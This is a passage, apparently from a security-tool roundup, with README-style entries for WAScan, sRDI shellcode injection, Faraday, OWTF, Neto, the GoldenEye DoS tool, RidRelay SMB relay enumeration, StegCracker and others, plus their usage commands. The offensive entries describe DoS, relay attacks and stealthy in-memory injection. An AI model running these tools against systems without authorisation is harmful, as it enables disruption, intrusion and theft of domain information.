  • Common File
  • Hidden Parameters
Disclosure
  • Credit Cards
  • Emails
  • Private IP
  • Errors -> (fatal errors,...)
  • SSN

Installation
$ git clone https://github.com/m4ll0k/WAScan.git wascan
$ cd wascan
$ pip install BeautifulSoup
$ python wascan.py

Usage
Fingerprint:
$ python wascan.py --url http://xxxxx.com/ --scan 0


Attacks:
$ python wascan.py --url http://xxxxx.com/index.php?id=1 --scan 1


Audit:
$ python wascan.py --url http://xxxxx.com/ --scan 2


Bruteforce:
$ python wascan.py --url http://xxxxx.com/ --scan 3


Disclosure:
$ python wascan.py --url http://xxxxx.com/ --scan 4


Full Scan:
$ python wascan.py --url http://xxxxx.com --scan 5 


Bruteforce Hidden Parameters:
$ python wascan.py --url http://xxxxx.com/test.php --brute


Advanced Usage
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234"
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --data "id=1" --method POST
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx --proxy-auth "root:4321"
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx --proxy-auth "root:4321 --ragent -v


SafeText - Script To Remove Homoglyphs And Zero-Width Characters To Allow For Safe Distribution Of Documents From Anonymous Sources


Tool to sanitize text to allow for safe distribution of documents from anonymous sources by removing zero-width characters and homoglyphs.
Individuals attempting to leak an email or other text file face the risk of identification through fingerprinting. Fingerprinting often occurs when the original distributor of the document has embedded some form of canary. For example, Elon Musk's 2008 email in response to leaks featured slightly different wording for each employee; the employees noticed this tactic, and it failed. Another tactic that is also employed is the introduction of nearly invisible changes to the text. SafeText is designed to identify and remove these changes. Specifically, this tool removes homoglyphs, zero-width characters, and other subtle characters. It will also attempt to identify unique spellings of words that could give away an individual's location.

Usage
To use SafeText, call:
python safetext.py inputfile
Example output is:
λ python safetext.py TestFile.txt
[*] Cleaning TestFile.txt to TestFile.txt.safe ...
[!] FOUND HOMOGLYPHIC CHARACTER CYRILLIC_large_H ON LINE 1
The message said: "(Н)ey, let's hang out!"
[!] FOUND a SPACE ON LINE # 2
Lorem*Ipsum*Dolor*Sit
[!] WARNING - Use of spelling (colour) that identifies country on line 3
[!] FOUND HOMOGLYPHIC CHARACTER GREEK_B ON LINE 5
[!] FOUND HOMOGLYPHIC CHARACTER GREEK_C ON LINE 5
Subject: (Β)udget (Ϲ)uts
[*] Output file closed
Note: The relevant characters will be underlined - not enclosed by parentheses. SafeText will output to infile.safe.


sRDI - Shellcode Implementation Of Reflective DLL Injection


sRDI allows for the conversion of DLL files to position independent shellcode.
Functionality is accomplished via two components:
  • C project which compiles a PE loader implementation (RDI) to shellcode
  • Conversion code which attaches the DLL, RDI, and user data together with a bootstrap

This project comprises the following elements:
  • ShellcodeRDI: Compiles shellcode for the DLL loader
  • NativeLoader: Converts DLL to shellcode if necessary, then injects it into memory
  • DotNetLoader: C# implementation of NativeLoader
  • Python\ConvertToShellcode.py: Convert DLL to shellcode in place
  • Python\EncodeBlobs.py: Encodes compiled sRDI blobs for static embedding
  • PowerShell\ConvertTo-Shellcode.ps1: Convert DLL to shellcode in place
  • FunctionTest: Imports sRDI C function for debug testing
  • TestDLL: Example DLL that includes two exported functions for call on Load and after
The DLL does not need to be compiled with RDI; however, the technique is cross-compatible.

Use Cases / Examples
Before use, it is recommended that you become familiar with Reflective DLL Injection and its purpose.

Convert DLL to shellcode using python
from ShellcodeRDI import *

dll = open("TestDLL_x86.dll", 'rb').read()
shellcode = ConvertToShellcode(dll)

Load DLL into memory using C# loader
DotNetLoader.exe TestDLL_x64.dll

Convert DLL with python script and load with Native EXE
python ConvertToShellcode.py TestDLL_x64.dll
NativeLoader.exe TestDLL_x64.bin

Convert DLL with powershell and load with Invoke-Shellcode
Import-Module .\Invoke-Shellcode.ps1
Import-Module .\ConvertTo-Shellcode.ps1
Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)

Stealth Considerations
There are many ways to detect memory injection. The loader function implements two stealth improvements on traditional RDI:
  • Proper Permissions: When relocating sections, memory permissions are set based on the section characteristics rather than a massive RWX blob.
  • PE Header Cleaning (Optional): The DOS Header and DOS Stub for the target DLL are completely wiped with null bytes on load (except for e_lfanew). This can be toggled with 0x1 in the flags argument for C/C#, or via command line args in Python/PowerShell.

Building
This project is built using Visual Studio 2015 (v140) and Windows SDK 8.1. The python script is written using Python 3.
The Python and Powershell scripts are located at:
  • Python\ConvertToShellcode.py
  • PowerShell\ConvertTo-Shellcode.ps1
After building the project, the other binaries will be located at:
  • bin\NativeLoader.exe
  • bin\DotNetLoader.exe
  • bin\TestDLL_.dll
  • bin\ShellcodeRDI_.bin

Faraday v3.0 - Collaborative Penetration Test and Vulnerability Management Platform


This new version has made major architectural changes to adapt the software to the new challenges of cybersecurity. It focuses on processing large volumes of data and facilitating user interaction with Faraday in their environment.

Faraday just got much faster

Architecture changes and a new database (PostgreSQL) gives us a new and revamped structure that allows us to support new objects and a bigger data volume. This dramatically improves most of the backend services that directly impact your day-to-day use...

Big changes require time

The total amount of work, in terms of commits, for the migration accounted for 29% of all the work done on the project to this day. We changed and reviewed around 75,440 lines of code, including the addition of a lot of unit tests.

Commits per week on faraday code repository from July 2017 to June 2018

 What’s new on the Backend
  • New Server: Implemented with Flask.
  • New Database engine: PostgreSQL.
  • New REST API: With complete support for CRUD for every object from Faraday. It makes it simpler to do queries for the DB and it opens up new ways for personalized integrations. Run python manage.py show_urls to see all our new API endpoints.
Example usage for getting hosts from the new api:
curl 'http://localhost:5985/_api/v2/ws/europe/hosts'  -H 'Cookie: AuthSession=[COOKIE]; session=[COOKIE];'
  • Better scalability and performance improvements. There’s a drastic reduction in time needed for searches in our API and with the new architecture it’s significantly easier to scale-up horizontally.

What’s new on the front

For this version we listened to feedback from our users to make Faraday friendlier with a major focus on making specific data more readily available and a faster interface.

The new dashboard

The new dashboard has been organized with a new layout to show relevant information first, helping users to find vulnerable spots in their workspace.


Updated Status Report

Changed and simplified the status report design:


Redesign of the hosts list

Now you can add and remove columns, plus see and filter by hostnames and services:


Small improvements that make your day

  • Imports Scan Outputs directly from the Web UI.
    • Now you can import results from your scans directly on our Web UI:



Check here a video about report upload from WebGUI:


  • Import Scan Outputs via API.
Here’s an example of the new API:

curl 'http://127.0.0.1:5985/_api/v2/ws/test/upload_report' -H 'Content-Type: multipart/form-data' -H 'Cookie: AuthSession=[COOKIE]; session=[COOKIE];' --data-binary $’[FILE BINARY DATA]’ --compressed
  • Dramatic performance upgrades.
  • Simplification of the model we used. Say "adios" to the interface object.
  • Access to the server using “/” instead of /_ui/ .
  • Ability to edit the names of workspaces.

New Plugins
  • HP WebInspect
  • IP360
  • Sslyze
  • Wfuzz
  • Xsssniper
  • Brutexss
  • Recon-NG
  • Sublist3r
  • Dirsearch

Full List of Changes
  • Allow faraday-server to have multiple instances
  • Add hostname to host
  • Interface removed from model and from persistence server lib (fplugin)
  • Performance improvements on the backend
  • Add quick change workspace name (from all views)
  • Allow user to change workspace
  • New faraday styles in all Webui views
  • Add search by id for vulnerabilities
  • Add new plugin Sslyze
  • Add new plugin Wfuzz
  • Add xsssniper plugin
  • Fix W3af, Zap plugins
  • Add Brutexss plugin
  • Allow to upload report file from external tools from the web
  • Fix sshcheck import file from GTK
  • Add reconng plugin
  • Add sublist3r plugin
  • Add HP Webinspect plugin
  • Add dirsearch plugin
  • Add ip360 plugin
  • CouchDB was replaced by PostgreSQL :)
  • Host object changed, now the name property is called ip
  • Interface object was removed
  • Note object was removed and replaced with Comment
  • Communication object was removed and replaced with Comment
  • Show credentials count in summarized report on the dashboard
  • Remove vuln template CWE fields, join it with references
  • Allow to search hosts by hostname, os and service name
  • Allow the user to specify the desired fields of the host list table
  • Add optional hostnames, services, MAC and description fields to the host list
  • Workspace names can be changed from the Web UI
  • Changed the scope field of a workspace from a free text input to a list of targets
  • Exploitation and severity fields only allow certain values. 
  • CWE CVEs were fixed to be valid. A script to convert custom CSVs was added.
  • Web UI path changed from /ui/ to / (ui has now a redirection to / for keeping backwards compatibility)
  • dirb plugin now creates an informational vulnerability instead of a note
  • Add confirmed column to exported CSV from Webui
  • Fixes in Arachni plugin
  • Add new parameters --keep-old and --keep-new for faraday CLI
  • Add new screenshot fplugin which takes a screenshot of the ip:ports of a given protocol
  • Add severity fix for Netsparker regular and cloud
  • Admin users can list and access all workspaces, even if they don't have permissions
  • Removed Chat feature (data is kept inside notes)
  • Plugin reports now can be imported in the server, from the Web UI
  • Add CVSS score to reference field in Nessus plugin.
  • Fix unicode characters bug in Netsparker plugin.
  • Fix Qualys plugin.
  • Fix bugs with MACOS and GTK.
  • Add response field added to model in grouped report template.
  • Add tooltip in WebUi with information about errors in executive report.
  • LDAP login is now done with user@domain.com, not just the username.
  • Fix Jira bugs in WebUi

https://www.faradaysec.com
https://forum.faradaysec.com/
https://www.faradaysec.com/ideas
https://github.com/infobyte/faraday
https://twitter.com/faradaysec

WTF - A Personal Information Dashboard For Your Terminal


A personal terminal-based dashboard utility, designed for displaying infrequently-needed, but very important, daily data.

Quick Start
Download and run the latest binary or install from source:
go get -u github.com/senorprogrammer/wtf
cd $GOPATH/src/github.com/senorprogrammer/wtf
make install
make run
Note: WTF is only compatible with Go versions 1.9.2 or later. It currently does not compile with gccgo.

Documentation
See https://wtfutil.com for the definitive documentation. Here's some short-cuts:


OWTF v2.4 - Offensive Web Testing Framework


OWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST so that pentesters will have more time to
  • See the big picture and think out of the box
  • More efficiently find, verify and combine vulnerabilities
  • Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions
  • Perform more tactical/targeted fuzzing on seemingly risky areas
  • Demonstrate true impact despite the short timeframes we are typically given to test.
The tool is highly configurable and anybody can trivially create simple plugins or add new tests in the configuration files without having any development experience.
Note: This tool is however not a silver bullet and will only be as good as the person using it: understanding and experience will be required to correctly interpret tool output and decide what to investigate further in order to demonstrate impact.

Requirements
OWTF is developed on Kali Linux and macOS, but it is made for Kali Linux (or other Debian derivatives).
OWTF supports both Python2 and Python3.

Installation
Recommended:
Using a virtualenv is highly recommended!
pip install git+https://github.com/owtf/owtf#egg=owtf
or clone the repo and
python setup.py install

If you want to change the database password in the Docker Compose setup, edit the environment variables in the docker-compose.yml file. If you prefer to override the environment variables in a .env file, use the file name owtf.env so that Docker Compose knows to include it.
To run OWTF on Windows or MacOS, OWTF uses Docker Compose. You need to have Docker Compose installed (check by docker-compose -v). After installing Docker Compose, simply run docker-compose up and open localhost:8009 for the OWTF web interface.

Install on OSX
Dependencies: Install Homebrew (https://brew.sh/) and follow the steps given below:
$ virtualenv <venv name>
$ source <venv name>/bin/activate
$ brew install coreutils gnu-sed openssl
# We need to install 'cryptography' first to avoid issues
$ pip install cryptography --global-option=build_ext --global-option="-L/usr/local/opt/openssl/lib" --global-option="-I/usr/local/opt/openssl/include"
$ git clone <this repo>
$ cd owtf
$ python setup.py install
# Run OWTF!
$ owtf

Features
  • Resilience: If one tool crashes, OWTF will move on to the next tool/test, saving the partial output of the tool up to the point it crashed.
  • Flexible: Pause and resume your work.
  • Tests Separation: OWTF separates its traffic to the target into mainly 3 types of plugins:
    • Passive : No traffic goes to the target
    • Semi Passive : Normal traffic to target
    • Active: Direct vulnerability probing
  • Extensive REST API.
  • Has almost complete OWASP Testing Guide(v3, v4), Top 10, NIST, CWE coverage.
  • Web interface: Easily manage large penetration testing engagements.
  • Interactive report:
  • Automated plugin rankings from the tool output, fully configurable by the user.
  • Configurable risk rankings
  • In-line notes editor for each plugin.

Links

Screenshots












Neto - A Tool To Analyse Browser Extensions


Project Neto is a Python 3 package conceived to analyse and unravel hidden features of browser plugins and extensions for well-known browsers such as Firefox and Chrome. It automates the process of unzipping the packaged files to extract these features from relevant resources in an extension, such as manifest.json, localization folders, or JavaScript and HTML source files.

Installation
To install the package, the user can choose pip3.
pip3 install -e . --user
Optionally, it can also be installed with administrator privileges using sudo:
sudo pip3 install -e .
A successful installation can be checked using:
python3 -c "import neto; print(neto.__version__)"

Quick Start
To perform the analysis of an extension, the analyst can type the following:
neto analysis -u https://yoururl.com/extension-name.xpi
The extension will be automatically downloaded and unzipped, by default into the system's temporary folder.
However, the analyst can also launch the analysis against a locally stored extension:
neto analysis -e ./my-extension-name.xpi
After the static analysis is performed, it will generate a JSON file that is stored by default in a newly created folder named output.
If you use Python, you can also import the package as a library in your own Python modules:
>>> from neto.lib.extensions import Extension
>>> my_extension = Extension ("./sample.xpi")
>>> my_extension.filename
'adblock_for_firefox-3.8.0-an+fx.xpi'
>>> my_extension.digest
'849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'
Apart from accessing the elements found in the extension using properties, the analyst can always access them as a dictionary:
>>> my_extension.__dict__
{'_analyser_version': '0.0.1', '_digest': '849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'…
If you are not using Python, you can use the JSON RPC daemon:
$ neto daemon

____ _ _ _ _ _
| _ \ _ __ ___ (_) ___ ___| |_ | \ | | ___| |_ ___
| |_) | '__/ _ \| |/ _ \/ __| __| | \| |/ _ \ __/ _ \
| __/| | | (_) | | __/ (__| |_ | |\ | __/ || (_) |
|_| |_| \___// |\___|\___|\__| |_| \_|\___|\__\___/
|__/

Developed by @ElevenPaths
Version: 0.5.0b


* Running on http://localhost:14041/ (Press CTRL+C to quit)
You can then run commands using your preferred JSON RPC library to write a client (we have written a short demo in the bin folder) or even curl:
 curl --data-binary '{"id":0, "method":"remote", "params":["https://example.com/myextension.xpi"], "jsonrpc": "2.0"}'  -H 'content-type:text/json;' http://localhost:14041

Features
The following is a non-exhaustive list of the features included in this package:
  • Manifest analysis.
  • Internal file hashing.
  • Entities extraction using regular expressions: IPv4, email, cryptocurrency addresses, URL, etc.
  • Comments extraction from HTML, CSS and JS files.
  • Cryptojacking detection engine based on known mining domains and expressions.
  • Suspicious Javascript code detection such as eval().
  • Certificate analysis if provided.
  • Batch analysis of previously downloaded extensions.


GoldenEye v1.2.0 - Layer 7 (KeepAlive+NoCache) DoS Test Tool


GoldenEye is a Python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is an HTTP DoS test tool.
Attack vector exploited: HTTP Keep-Alive + NoCache

Usage
 USAGE: ./goldeneye.py <url> [OPTIONS]

OPTIONS:
Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-n, --nosslcheck Do not verify SSL Certificate (default: True)
-h, --help Shows this help
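For example, a hedged invocation combining the options above against a host you are authorized to test (the URL is a placeholder):
./goldeneye.py http://test-target.example/ -w 100 -s 70 -m random -d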

Utilities

Changelog
  • 2016-02-06 Added support for not verifying SSL Certificates
  • 2014-02-20 Added randomly created user agents (still RFC compliant).
  • 2014-02-19 Removed silly referers and user agents. Improved randomness of referers. Added external user-agent list support.
  • 2013-03-26 Changed from threading to multiprocessing. Still has some bugs to resolve, like I still don't know how to properly shut down the manager.
  • 2012-12-09 Initial release

To-do
  • Change from getopt to argparse
  • Change from string.format() to printf-like

LEGAL NOTICE
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.


Ridrelay - Quick And Easy Way To Get Domain Usernames While On An Internal Network


Enumerate usernames on a domain where you have no creds by using SMB Relay with low priv. Quick and easy way to get domain usernames while on an internal network.

How it works
RidRelay combines the SMB Relay attack, common lsarpc based queries and RID cycling to get a list of domain usernames. It takes these steps:
  1. Spins up an SMB server and waits for an incoming SMB connection
  2. The incoming credentials are relayed to a specified target, creating a connection with the context of the relayed user
  3. Queries are made down the SMB connection to the lsarpc pipe to get the list of domain usernames. This is done by cycling up to 50000 RIDs
(For best results, use with Responder)

Dependencies
  • Python 2.7 (sorry but impacket doesn't play nice with 3 :( )
  • Impacket v0.9.17 or above

Installation
pipenv install --two
pipenv shell

# Optional: Run if installing impacket
git submodule update --init --recursive
cd submodules/impacket
python setup.py install
cd ../..

Usage
First, find a target host to relay to. The target must be a member of the domain and MUST have SMB signing off. CrackMapExec can get this info for you very quickly!
Start RidRelay pointing to the target:
python ridrelay.py -t 10.0.0.50
OR, to also output usernames to a file:
python ridrelay.py -t 10.0.0.50 -o path_to_output.txt
Highly Recommended: Start Responder to trick users into connecting to RidRelay.

TODO:
  • Add password policy enumeration
  • Dynamic relaying based on where incoming creds have admin rights
  • Getting active sessions???
  • Connect with Bloodhound???


StegCracker - Steganography Brute-Force Utility To Uncover Hidden Data Inside Files


Steganography brute-force utility to uncover hidden data inside files.

Usage
Using stegcracker is simple: pass a file to it as its first parameter and, optionally, pass the path to a wordlist of passwords to try as its second parameter. If this is not set, it will default to the rockyou.txt password file, which ships with Kali Linux or can be downloaded here.
$ stegcracker <file> [<wordlist>]
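For example, a hedged run against a suspect image using the wordlist that ships with Kali (the image name is a placeholder; on Kali the list may ship gzipped and need extracting first):
$ gunzip /usr/share/wordlists/rockyou.txt.gz   # only if not already extracted
$ stegcracker suspect.jpg /usr/share/wordlists/rockyou.txt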

Installation
To install the program, follow these steps:
$ sudo apt-get install steghide -y
$ sudo curl https://raw.githubusercontent.com/Paradoxis/StegCracker/master/stegcracker > /bin/stegcracker
$ sudo chmod +x /bin/stegcracker

